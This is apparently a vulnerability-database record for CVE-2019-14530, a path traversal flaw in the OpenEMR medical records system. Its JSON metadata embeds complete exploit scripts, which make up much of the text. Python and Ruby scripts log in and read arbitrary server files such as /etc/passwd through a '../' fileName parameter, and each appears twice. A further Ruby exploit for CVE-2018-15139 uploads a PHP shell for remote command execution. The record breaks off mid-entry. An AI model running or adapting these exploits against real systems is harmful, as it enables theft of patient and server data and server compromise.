Description
An issue was discovered in custom/ajax_download.php in OpenEMR before 5.0.2 via the fileName parameter. An attacker can download any file (that is readable by the user www-data) from server storage. If the requested file is writable for the www-data user and the directory /var/www/openemr/sites/default/documents/cqm_qrda/ exists, it will be deleted from server.
**Recent assessments:**
**noraj** at July 08, 2021 7:42pm UTC reported:
* Title: OpenEMR < 5.0.2 – (Authenticated) Path Traversal – Local File Disclosure
* Vulnerable version: < 5.0.2 (it means up to 5.0.1.7)
* Patch: <https://github.com/openemr/openemr/pull/2592/files>
* Docker PoC: <https://github.com/sec-it/exploit-CVE-2019-14530/blob/master/docker-compose.yml>
Assessed Attacker Value: 4
Assessed Attacker Value: 4Assessed Attacker Value: 4
Related
{"id": "AKB:CC8965D5-97BC-4618-BABB-A087A2406B74", "type": "attackerkb", "bulletinFamily": "info", "title": "CVE-2019-14530", "description": "An issue was discovered in custom/ajax_download.php in OpenEMR before 5.0.2 via the fileName parameter. An attacker can download any file (that is readable by the user www-data) from server storage. If the requested file is writable for the www-data user and the directory /var/www/openemr/sites/default/documents/cqm_qrda/ exists, it will be deleted from server.\n\n \n**Recent assessments:** \n \n**noraj** at July 08, 2021 7:42pm UTC reported:\n\n * Title: OpenEMR < 5.0.2 \u2013 (Authenticated) Path Traversal \u2013 Local File Disclosure \n\n * Vulnerable version: < 5.0.2 (it means up to 5.0.1.7) \n\n * Patch: <https://github.com/openemr/openemr/pull/2592/files> \n\n * Docker PoC: <https://github.com/sec-it/exploit-CVE-2019-14530/blob/master/docker-compose.yml> \n\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 4\n", "published": "2019-08-13T00:00:00", "modified": "2020-06-05T00:00:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "href": "https://attackerkb.com/topics/M8KwhNKjmJ/cve-2019-14530", "reporter": "AttackerKB", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14530", "https://github.com/sec-it/exploit-CVE-2019-14530", "https://github.com/openemr/openemr/pull/2592", "https://github.com/Wezery/CVE-2019-14530", "http://packetstormsecurity.com/files/163215/OpenEMR-5.0.1.7-Path-Traversal.html", "http://packetstormsecurity.com/files/163375/OpenEMR-5.0.1.7-Path-Traversal.html"], "cvelist": ["CVE-2019-14530"], "immutableFields": [], "lastseen": "2021-07-20T20:08:55", "viewCount": 2, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2019-14530"]}, {"type": "exploitdb", "idList": ["EDB-ID:50037", "EDB-ID:50087", "EDB-ID:50122"]}, {"type": "githubexploit", "idList": ["9B456B35-97DF-53EE-B56C-AA10A7CE7F5E", "BF123FAC-E699-5CD0-8741-C391F80816EA"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310142700"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:163215", "PACKETSTORM:163375", "PACKETSTORM:163482"]}, {"type": "zdt", "idList": ["1337DAY-ID-36449", "1337DAY-ID-36507", "1337DAY-ID-36549"]}], "rev": 4}, "score": {"value": 1.4, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2019-14530"]}, {"type": "exploitdb", "idList": ["EDB-ID:50037"]}, {"type": "githubexploit", "idList": ["9B456B35-97DF-53EE-B56C-AA10A7CE7F5E", "BF123FAC-E699-5CD0-8741-C391F80816EA"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310142700"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:163215"]}, {"type": "zdt", "idList": ["1337DAY-ID-36449", "1337DAY-ID-36507", "1337DAY-ID-36549"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2019-14530", "epss": "0.947480000", "percentile": "0.987590000", "modified": "2023-03-17"}], "vulnersScore": 1.4}, "attackerkb": {"attackerValue": 4, "exploitability": 4}, "wildExploited": false, "wildExploitedCategory": {}, "wildExploitedReports": [], "references_categories": {"Canonical": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14530"], "Exploit": ["https://github.com/sec-it/exploit-CVE-2019-14530"], "Miscellaneous": ["https://github.com/openemr/openemr/pull/2592", "https://github.com/Wezery/CVE-2019-14530", "http://packetstormsecurity.com/files/163215/OpenEMR-5.0.1.7-Path-Traversal.html", "http://packetstormsecurity.com/files/163375/OpenEMR-5.0.1.7-Path-Traversal.html"]}, "tags": ["easy_to_develop", "default_configuration", "post_auth"], "mitre_vector": {"Initial Access": ["Exploit Public-Facing Application(Validated)"]}, "last_activity": "2021-07-08T19:42:00", "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.0"}, "exploitabilityScore": 2.8, "impactScore": 3.6}, "edition": 2, "scheme": null, "_state": {"wildexploited": 1647356732, "dependencies": 1645995693, "score": 1684008354, "epss": 1679098904}, "_internal": {"wildexploited_cvelist": null, "score_hash": "296b05f579a35de62114aac0ed3e7fbd"}}
{"githubexploit": [{"lastseen": "2022-02-10T21:12:03", "description": "# CVE-2019-14530\n\nPath traversal and DoS vulnerability in OpenEM...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-08-13T01:33:11", "type": "githubexploit", "title": "Exploit for Path Traversal in Open-Emr Openemr", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-14530"], "modified": "2022-01-09T21:00:36", "id": "9B456B35-97DF-53EE-B56C-AA10A7CE7F5E", "href": "", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-02-10T21:28:35", "description": "# OpenEMR CVE-2019-14530 exploit\n\n> OpenEMR < 5.0.2 - (Authentic...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-30T08:59:57", "type": "githubexploit", "title": "Exploit for Path Traversal in Open-Emr Openemr", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-14530"], "modified": "2021-07-08T19:35:09", "id": "BF123FAC-E699-5CD0-8741-C391F80816EA", "href": "", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}, "privateArea": 1}], "packetstorm": [{"lastseen": "2021-06-22T19:45:45", "description": "", "cvss3": {}, "published": "2021-06-18T00:00:00", "type": "packetstorm", "title": "OpenEMR 5.0.1.7 Path Traversal", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-14530"], "modified": "2021-06-18T00:00:00", "id": "PACKETSTORM:163215", "href": "https://packetstormsecurity.com/files/163215/OpenEMR-5.0.1.7-Path-Traversal.html", "sourceData": "`# Exploit Title: OpenEMR 5.0.1.7 - 'fileName' Path Traversal (Authenticated) \n# Date 16.06.2021 \n# Exploit Author: Ron Jost (Hacker5preme) \n# Vendor Homepage: https://www.open-emr.org/ \n# Software Link: https://github.com/openemr/openemr/archive/refs/tags/v5_0_1_7.zip \n# Version: All versions prior to 5.0.2 \n# Tested on: Ubuntu 18.04 \n# CVE: CVE-2019-14530 \n# CWE: CWE-22 \n# Documentation: https://github.com/Hacker5preme/Exploits/blob/main/CVE-2019-14530-Exploit/README.md \n# Reference: https://raw.githubusercontent.com/Wezery/CVE-2019-14530/master/Path%20traversal%20and%20DoS.pdf \n \n''' \nDescription: \nAn issue was discovered in custom/ajax_download.php in OpenEMR before 5.0.2 via the fileName parameter. \nAn authenticated attacker can download any file (that is readable by the user www-data) \nfrom server storage. If the requested file is writable for the www-data user and the directory \n/var/www/openemr/sites/default/documents/cqm_qrda/ exists, it will be deleted from server. \n''' \n \n \n''' \nBanner: \n''' \nbanner = \"\"\" \n \n \n______ _______ ____ ___ _ ___ _ _ _ ____ _____ ___ \n/ ___\\ \\ / / ____| |___ \\ / _ \\/ |/ _ \\ / | || || ___|___ / / _ \\ \n| | \\ \\ / /| _| _____ __) | | | | | (_) |_____| | || ||___ \\ |_ \\| | | | \n| |___ \\ V / | |__|_____/ __/| |_| | |\\__, |_____| |__ _|__) |__) | |_| | \n\\____| \\_/ |_____| |_____|\\___/|_| /_/ |_| |_||____/____/ \\___/ \n \nby Hacker5preme \n \n\"\"\" \nprint(banner) \n \n \n''' \nImport required modules: \n''' \nimport requests \nimport argparse \n \n \n''' \nUser-Input: \n''' \nmy_parser = argparse.ArgumentParser(description='OpenEMR Path Traversal') \nmy_parser.add_argument('-T', '--IP', type=str) \nmy_parser.add_argument('-P', '--PORT', type=str) \nmy_parser.add_argument('-U', '--PATH', type=str) \nmy_parser.add_argument('-u', '--USERNAME', type=str) \nmy_parser.add_argument('-p', '--PASSWORD', type=str) \nargs = my_parser.parse_args() \ntarget_ip = args.IP \ntarget_port = args.PORT \nopenemr_path = args.PATH \nusername = args.USERNAME \npassword = args.PASSWORD \nprint('') \nFilepath = input('[+] Filepath: ') \n \n \n''' \nAuthentication: \n''' \nsession = requests.Session() \nauth_url = 'http://' + target_ip + ':' + target_port + openemr_path + '/interface/main/main_screen.php?auth=login&site=default' \n \n# Header: \nheader = { \n'Host': target_ip, \n'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0', \n'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', \n'Accept-Language': 'de,en-US;q=0.7,en;q=0.3', \n'Accept-Encoding': 'gzip, deflate', \n'Content-Type': 'application/x-www-form-urlencoded', \n'Origin': 'http://' + target_ip, \n'Connection': 'close', \n'Upgrade-Insecure-Requests': '1' \n} \n \n# Body: \nbody = { \n'new_login_session_management': '1', \n'authProvider': 'Default', \n'authUser': username, \n'clearPass': password, \n'languageChoice': '1' \n} \n \n# Authenticate: \nprint('') \nauth = session.post(auth_url, headers=header, data=body) \nif 'error=1&site=' in auth.text: \nprint('[-] Authentication failed') \nexit() \nelse: \nprint('[+] Authentication successfull: ' + str(auth)) \n \n \n''' \nPath Traversal: \n''' \nurl_static = 'http://' + target_ip + ':' + target_port + openemr_path \nurl_dynamic = '/custom/ajax_download.php?fileName=../../../../../../../../..' \nurl_exploit = url_static + url_dynamic + Filepath \nprint('') \nprint('[+] Constructed malicious URL: ') \n \n# Headers: \nheader = { \n'Host': target_ip, \n'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0', \n'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', \n'Accept-Language': 'de,en-US;q=0.7,en;q=0.3', \n'Accept-Encoding': 'gzip, deflate', \n'Connection': 'close', \n'Upgrade-Insecure-Requests': '1' \n} \n \n# Exploit: \nprint('') \nprint('[+] Contents of ' + Filepath + ':') \nprint('') \ngetfile = session.get(url_exploit, headers = header) \nprint(getfile.text) \n \n`\n", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "sourceHref": "https://packetstormsecurity.com/files/download/163215/openemr5017-traversal.txt"}, {"lastseen": "2021-07-05T17:16:09", "description": "", "cvss3": {}, "published": "2021-07-05T00:00:00", "type": "packetstorm", "title": "OpenEMR 5.0.1.7 Path Traversal", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-14530"], "modified": "2021-07-05T00:00:00", "id": "PACKETSTORM:163375", "href": "https://packetstormsecurity.com/files/163375/OpenEMR-5.0.1.7-Path-Traversal.html", "sourceData": "`# Title: OpenEMR 5.0.1.7 - 'fileName' Path Traversal (Authenticated) (2) \n# Exploit author: noraj (Alexandre ZANNI) for SEC-IT (http://secit.fr) \n# Exploit source: https://github.com/sec-it/exploit-CVE-2019-14530 \n# Date: 2021-06-24 \n# Vendor Homepage: https://www.open-emr.org/ \n# Software Link: https://github.com/openemr/openemr/archive/v5_0_1_7.tar.gz \n# Docker PoC: https://github.com/sec-it/exploit-CVE-2019-14530/blob/master/docker-compose.yml \n# Version: < 5.0.2 (it means up to 5.0.1.7) \n# Tested on: OpenEMR Version 5.0.1 \n# References: https://www.exploit-db.com/exploits/50037 \n# CVE: CVE-2019-14530 \n# CWE: CWE-22 \n# Patch: https://github.com/openemr/openemr/pull/2592/files \n \n#!/usr/bin/env ruby \n \nrequire 'pathname' \nrequire 'httpx' \nrequire 'docopt' \n \ndoc = <<~DOCOPT \nOpenEMR < 5.0.2 - (Authenticated) Path Traversal - Local File Disclosure \n \nSource: https://github.com/sec-it/exploit-CVE-2019-14530 \n \nUsage: \n#{__FILE__} exploit <url> <filename> <username> <password> [--debug] \n#{__FILE__} -h | --help \n \nOptions: \n<url> Root URL (base path) including HTTP scheme, port and root folder \n<filename> Filename of the file to be read \n<username> Username of the admin \n<password> Password of the admin \n--debug Display arguments \n-h, --help Show this screen \n \nExamples: \n#{__FILE__} exploit http://example.org/openemr /etc/passwd admin pass \n#{__FILE__} exploit https://example.org:5000/ /etc/passwd admin pass \nDOCOPT \n \ndef login(root_url, user, pass, http) \nvuln_url = \"#{root_url}/interface/main/main_screen.php?auth=login&site=default\" \nparams = { \n'new_login_session_management' => '1', \n'authProvider' => 'Default', \n'authUser' => user, \n'clearPass' => pass, \n'languageChoice' => '1' \n} \n \nhttp.post(vuln_url, form: params).body.to_s \nend \n \ndef exploit(root_url, filename, http) \nvuln_url = \"#{root_url}/custom/ajax_download.php?fileName=../../../../../../../../../#{filename}\" \n \nhttp.get(vuln_url).body.to_s \nend \n \nbegin \nargs = Docopt.docopt(doc) \npp args if args['--debug'] \n \nif args['exploit'] \nhttp = HTTPX.plugin(:cookies).plugin(:follow_redirects) \nlogin(args['<url>'], args['<username>'], args['<password>'], http) \nputs exploit(args['<url>'], args['<filename>'], http) \nend \nrescue Docopt::Exit => e \nputs e.message \nend \n \n`\n", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "sourceHref": "https://packetstormsecurity.com/files/download/163375/openemr5017fn-traversal.txt"}, {"lastseen": "2021-07-13T16:00:46", "description": "", "cvss3": {}, "published": "2021-07-13T00:00:00", "type": "packetstorm", "title": "OpenEMR 5.0.1.3 Shell Upload", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-15139", "CVE-2019-14530"], "modified": "2021-07-13T00:00:00", "id": "PACKETSTORM:163482", "href": "https://packetstormsecurity.com/files/163482/OpenEMR-5.0.1.3-Shell-Upload.html", "sourceData": "`# Title: OpenEMR 5.0.1.3 - 'manage_site_files' Remote Code Execution (Authenticated) (2) \n# Exploit author: noraj (Alexandre ZANNI) for SEC-IT (http://secit.fr) \n# Date: 2021-07-05 \n# Vendor Homepage: https://www.open-emr.org/ \n# Software Link: https://github.com/openemr/openemr/archive/v5_0_1_3.tar.gz \n# Docker PoC: https://github.com/sec-it/exploit-CVE-2018-15139/blob/master/docker-compose.yml \n# Version: < 5.0.1.4 (it means up to 5.0.1.3) \n# Tested on: OpenEMR Version 5.0.0.8 \n# References: https://www.exploit-db.com/exploits/49998 \n# CVE: CVE-2018-15139 \n# CWE: CWE-434 \n# Patch: https://github.com/openemr/openemr/pull/1757/commits/c2808a0493243f618bbbb3459af23c7da3dc5485 \n \n#!/usr/bin/env ruby \n \nrequire 'pathname' \nrequire 'httpx' \nrequire 'http/form_data' \nrequire 'docopt' \n \ndoc = <<~DOCOPT \nOpenEMR < 5.0.1.4 - (Authenticated) File upload - Remote command execution \n \nSource: https://github.com/sec-it/exploit-CVE-2019-14530 \n \nUsage: \n#{__FILE__} exploit <url> <filename> <username> <password> [--debug] \n#{__FILE__} -h | --help \n \nOptions: \n<url> Root URL (base path) including HTTP scheme, port and root folder \n<filename> Filename of the shell to be uploaded \n<username> Username of the admin \n<password> Password of the admin \n--debug Display arguments \n-h, --help Show this screen \n \nExamples: \n#{__FILE__} exploit http://example.org/openemr shell.php admin pass \n#{__FILE__} exploit https://example.org:5000/ shell.php admin pass \nDOCOPT \n \ndef login(root_url, user, pass, http) \nvuln_url = \"#{root_url}/interface/main/main_screen.php?auth=login&site=default\" \nparams = { \n'new_login_session_management' => '1', \n'authProvider' => 'Default', \n'authUser' => user, \n'clearPass' => pass, \n'languageChoice' => '1' \n} \n \nhttp.post(vuln_url, form: params).body.to_s \nend \n \ndef upload(root_url, filepath, http) \nvuln_url = \"#{root_url}/interface/super/manage_site_files.php\" \npn = Pathname.new(filepath) \n \nparams = { \nform_image: { \ncontent_type: 'application/x-php', \nfilename: pn.basename.to_s, \nbody: pn \n}, \nbn_save: 'Save' \n} \n \nres = http.post(vuln_url, form: params) \n \nreturn '[-] File not upload' unless (200..299).include?(res.status) \n \n\"[+] File uploaded:\\n#{root_url}/sites/default/images/#{pn.basename}\" \nend \n \nbegin \nargs = Docopt.docopt(doc) \npp args if args['--debug'] \n \nif args['exploit'] \nhttp = HTTPX.plugin(:cookies).plugin(:follow_redirects).plugin(:multipart) \nlogin(args['<url>'], args['<username>'], args['<password>'], http) \nputs upload(args['<url>'], args['<filename>'], http) \nend \nrescue Docopt::Exit => e \nputs e.message \nend \n \n`\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/163482/openemr5013msf-shell.txt"}], "zdt": [{"lastseen": "2021-12-04T15:55:50", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 6.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2021-06-21T00:00:00", "type": "zdt", "title": "OpenEMR 5.0.1.7 - (fileName) Path Traversal (Authenticated) Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-14530"], "modified": "2021-06-21T00:00:00", "id": "1337DAY-ID-36449", "href": "https://0day.today/exploit/description/36449", "sourceData": "# Exploit Title: OpenEMR 5.0.1.7 - 'fileName' Path Traversal (Authenticated)\n# Exploit Author: Ron Jost (Hacker5preme)\n# Vendor Homepage: https://www.open-emr.org/\n# Software Link: https://github.com/openemr/openemr/archive/refs/tags/v5_0_1_7.zip\n# Version: All versions prior to 5.0.2\n# Tested on: Ubuntu 18.04\n# CVE: CVE-2019-14530\n# CWE: CWE-22\n# Documentation: https://github.com/Hacker5preme/Exploits/blob/main/CVE-2019-14530-Exploit/README.md\n# Reference: https://raw.githubusercontent.com/Wezery/CVE-2019-14530/master/Path%20traversal%20and%20DoS.pdf\n\n'''\nDescription:\nAn issue was discovered in custom/ajax_download.php in OpenEMR before 5.0.2 via the fileName parameter.\nAn authenticated attacker can download any file (that is readable by the user www-data)\nfrom server storage. If the requested file is writable for the www-data user and the directory\n/var/www/openemr/sites/default/documents/cqm_qrda/ exists, it will be deleted from server.\n'''\n\n\n'''\nBanner:\n'''\nbanner = \"\"\" \n \n \n ______ _______ ____ ___ _ ___ _ _ _ ____ _____ ___ \n / ___\\ \\ / / ____| |___ \\ / _ \\/ |/ _ \\ / | || || ___|___ / / _ \\ \n| | \\ \\ / /| _| _____ __) | | | | | (_) |_____| | || ||___ \\ |_ \\| | | |\n| |___ \\ V / | |__|_____/ __/| |_| | |\\__, |_____| |__ _|__) |__) | |_| |\n \\____| \\_/ |_____| |_____|\\___/|_| /_/ |_| |_||____/____/ \\___/ \n \n by Hacker5preme\n \n\"\"\"\nprint(banner)\n\n\n'''\nImport required modules:\n'''\nimport requests\nimport argparse\n\n\n'''\nUser-Input:\n'''\nmy_parser = argparse.ArgumentParser(description='OpenEMR Path Traversal')\nmy_parser.add_argument('-T', '--IP', type=str)\nmy_parser.add_argument('-P', '--PORT', type=str)\nmy_parser.add_argument('-U', '--PATH', type=str)\nmy_parser.add_argument('-u', '--USERNAME', type=str)\nmy_parser.add_argument('-p', '--PASSWORD', type=str)\nargs = my_parser.parse_args()\ntarget_ip = args.IP\ntarget_port = args.PORT\nopenemr_path = args.PATH\nusername = args.USERNAME\npassword = args.PASSWORD\nprint('')\nFilepath = input('[+] Filepath: ')\n\n\n'''\nAuthentication:\n'''\nsession = requests.Session()\nauth_url = 'http://' + target_ip + ':' + target_port + openemr_path + '/interface/main/main_screen.php?auth=login&site=default'\n\n# Header:\nheader = {\n 'Host': target_ip,\n 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0',\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',\n 'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',\n 'Accept-Encoding': 'gzip, deflate',\n 'Content-Type': 'application/x-www-form-urlencoded',\n 'Origin': 'http://' + target_ip,\n 'Connection': 'close',\n 'Upgrade-Insecure-Requests': '1'\n}\n\n# Body:\nbody = {\n 'new_login_session_management': '1',\n 'authProvider': 'Default',\n 'authUser': username,\n 'clearPass': password,\n 'languageChoice': '1'\n}\n\n# Authenticate:\nprint('')\nauth = session.post(auth_url, headers=header, data=body)\nif 'error=1&site=' in auth.text:\n print('[-] Authentication failed')\n exit()\nelse:\n print('[+] Authentication successfull: ' + str(auth))\n\n\n'''\nPath Traversal:\n'''\nurl_static = 'http://' + target_ip + ':' + target_port + openemr_path\nurl_dynamic = '/custom/ajax_download.php?fileName=../../../../../../../../..'\nurl_exploit = url_static + url_dynamic + Filepath\nprint('')\nprint('[+] Constructed malicious URL: ')\n\n# Headers:\nheader = {\n 'Host': target_ip,\n 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0',\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',\n 'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',\n 'Accept-Encoding': 'gzip, deflate',\n 'Connection': 'close',\n 'Upgrade-Insecure-Requests': '1'\n}\n\n# Exploit:\nprint('')\nprint('[+] Contents of ' + Filepath + ':')\nprint('')\ngetfile = session.get(url_exploit, headers = header)\nprint(getfile.text)\n", "sourceHref": "https://0day.today/exploit/36449", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}, {"lastseen": "2021-12-22T15:29:26", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 6.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2021-07-05T00:00:00", "type": "zdt", "title": "OpenEMR 5.0.1.7 - (fileName) Path Traversal (Authenticated) Exploit (2)", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-14530"], "modified": "2021-07-05T00:00:00", "id": "1337DAY-ID-36507", "href": "https://0day.today/exploit/description/36507", "sourceData": "# Title: OpenEMR 5.0.1.7 - 'fileName' Path Traversal (Authenticated) (2)\n# Exploit author: noraj (Alexandre ZANNI) for SEC-IT (http://secit.fr)\n# Exploit source: https://github.com/sec-it/exploit-CVE-2019-14530\n# Vendor Homepage: https://www.open-emr.org/\n# Software Link: https://github.com/openemr/openemr/archive/v5_0_1_7.tar.gz\n# Docker PoC: https://github.com/sec-it/exploit-CVE-2019-14530/blob/master/docker-compose.yml\n# Version: < 5.0.2 (it means up to 5.0.1.7)\n# Tested on: OpenEMR Version 5.0.1\n# References: https://www.exploit-db.com/exploits/50037\n# CVE: CVE-2019-14530\n# CWE: CWE-22\n# Patch: https://github.com/openemr/openemr/pull/2592/files\n\n#!/usr/bin/env ruby\n\nrequire 'pathname'\nrequire 'httpx'\nrequire 'docopt'\n\ndoc = <<~DOCOPT\n OpenEMR < 5.0.2 - (Authenticated) Path Traversal - Local File Disclosure\n\n Source: https://github.com/sec-it/exploit-CVE-2019-14530\n\n Usage:\n #{__FILE__} exploit <url> <filename> <username> <password> [--debug]\n #{__FILE__} -h | --help\n\n Options:\n <url> Root URL (base path) including HTTP scheme, port and root folder\n <filename> Filename of the file to be read\n <username> Username of the admin\n <password> Password of the admin\n --debug Display arguments\n -h, --help Show this screen\n\n Examples:\n #{__FILE__} exploit http://example.org/openemr /etc/passwd admin pass\n #{__FILE__} exploit https://example.org:5000/ /etc/passwd admin pass\nDOCOPT\n\ndef login(root_url, user, pass, http)\n vuln_url = \"#{root_url}/interface/main/main_screen.php?auth=login&site=default\"\n params = {\n 'new_login_session_management' => '1',\n 'authProvider' => 'Default',\n 'authUser' => user,\n 'clearPass' => pass,\n 'languageChoice' => '1'\n }\n\n http.post(vuln_url, form: params).body.to_s\nend\n\ndef exploit(root_url, filename, http)\n vuln_url = \"#{root_url}/custom/ajax_download.php?fileName=../../../../../../../../../#{filename}\"\n\n http.get(vuln_url).body.to_s\nend\n\nbegin\n args = Docopt.docopt(doc)\n pp args if args['--debug']\n\n if args['exploit']\n http = HTTPX.plugin(:cookies).plugin(:follow_redirects)\n login(args['<url>'], args['<username>'], args['<password>'], http)\n puts exploit(args['<url>'], args['<filename>'], http)\n end\nrescue Docopt::Exit => e\n puts e.message\nend\n", "sourceHref": "https://0day.today/exploit/36507", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}, {"lastseen": "2021-12-20T11:35:52", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": 